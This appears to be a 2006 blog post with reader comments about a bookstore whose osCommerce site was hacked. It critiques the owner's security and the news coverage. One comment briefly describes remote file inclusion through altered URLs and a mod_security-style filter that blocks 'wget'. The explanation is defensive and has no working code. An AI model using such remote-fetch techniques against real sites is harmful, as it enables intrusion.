Oceania Books Hacked - osCommerce
Came across this halfway interesting story about a bookstore whose osCommerce site was "hacked"…there's some interesting comments in the story which I would say are more akin to knee-jerk reactions rather than anything else:
He has now invested in a firewall program intended to block hackers
Hmmmm. Unsure how a firewall could have helped to be honest - can anyone else give me a clue on this.
no blame lay with Mr Scoles.
Of course the blame lies with the Site Owner! Who else can the blame be placed upon? Either his implementation of osCommerce was unsecure (possibly leaving the Admin wide open) - or his choice of webshost was not the greatest (possibly unsecure servers)?
We didn't have them (computers) at school in my day, so I had nothing to do with them. I know nothing about IT, I was just a book collector. I just feel sick, like I've been involved in a crime.
As a business owner, should this guy have known that his skill is in running his business? Why not leave the e-commerce aspect to someone else? This might cost a bit of money, but at least he wouldn't be making statements like the one above.
may have attracted the hacker's attention because of the sheer size of his site. It included information and photographs of some 1000 books
1000 products is a small osCommerce store! I would certainly say that the "hacker" did not target this store because of it's size.
website has been suspended
Why on earth? Wouldn't it be quite simple to get new hosting, a new domain name, get it all secured, then swap the databases over? Point the old domain to the new and you're firing all 4 cylinders again…
I have to seriously think about whether I want to continue on-line. It's a lesson that should be passed on to all businesses thinking about doing this.
The lesson here is to know what your strengths are and play to them. If you are unskilled at something (such as setting up an e-commerce store), leave it to someone who does know a bit about e-comm!
With that said, I'm sorry to see this guy having problems 
and can only wish the best to get the e-commerce side of the business up-to-speed.
Comment by Khalid — June 26, 2006 @ 2:39 pm
Some hack attempts can be done by altering a URL to include or fetch a remote file, which is then executed via PHP, and can be used to gain user privileges.
As such, some firewalls can block these requests, as can mod_security, by comparing the url to a list of filters. I.e. "don't allow 'wget'" which is notoriously used by script kiddied to fetch files.
Khalid
Comment by DotComDosh — June 27, 2006 @ 2:41 pm
Bottom line is his site was never that popular, it got hit by chance, and now he's trying to drum up business by threatening to close it. Scuse me while I get comfy and doze off..
Seriously though, having a site hacked isn't a pleasant experience. As for blame, if your car broke down, you were the one that fixed it, and you were quoted in an article as saying 'I have no clue about mechanics, I just drive the car', then why were you tinkering with it in the first place?
Hope he didn't read the 'Readers Digest Guide to setting up an online shop' (hope to god I don't see an ad for that on the TV now!)